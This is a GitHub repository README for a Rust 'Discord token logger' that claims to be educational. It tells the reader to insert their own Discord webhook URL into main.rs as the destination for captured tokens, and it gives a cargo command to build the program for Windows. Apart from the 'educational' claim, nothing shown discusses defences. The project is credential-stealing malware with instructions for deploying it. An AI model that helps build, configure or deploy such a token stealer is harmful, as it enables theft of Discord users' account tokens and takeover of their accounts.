You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
This project is a Discord token logger written in Rust, designed for educational purposes to demonstrate how Discord tokens can be captured and managed securely. It aims to educate users about potential security vulnerabilities and how to protect against them.
On line 12 in main.rs (shown below) you must replace the variable with your webhook url
let url = "Discord Webhook URL";
To build just do
$ cargo build --target x86_64-pc-windows-gnu
Sidenote, I hate strings :3
About
This project is a Discord token logger written in Rust, designed for educational purposes to demonstrate how Discord tokens can be captured and managed securely. It aims to educate users about potential security vulnerabilities and how to protect against them.